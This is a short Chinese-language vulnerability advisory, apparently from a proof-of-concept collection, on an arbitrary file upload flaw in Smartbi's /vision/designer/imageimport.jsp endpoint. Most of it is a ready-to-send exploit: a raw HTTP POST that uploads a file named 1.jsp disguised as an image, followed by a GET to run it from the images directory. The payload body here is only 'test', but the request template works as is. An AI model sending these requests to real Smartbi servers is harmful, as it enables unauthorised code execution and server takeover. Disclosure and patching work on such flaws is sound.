Smartbi /imageimport.jsp 存在任意文件上传

日期: 2025-09-03 | 影响软件: Smartbi | POC: 已公开

漏洞描述

Smartbi存在文件上传漏洞,攻击者可利用该漏洞通过上传恶意文件来获取服务器权限。

PoC代码

POST /vision/designer/imageimport.jsp HTTP/1.1
Host: 
Cookie: UserLogging=false; FQConfigLogined=; FQPassword=; JSESSIONID=AAEDEBC8984E4F540DFAAF8C0F932035
X-File-Type: image
X-File-Name: 1.jsp
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------2927288396864

test


GET /vision/designer/images/1.jsp

相关漏洞推荐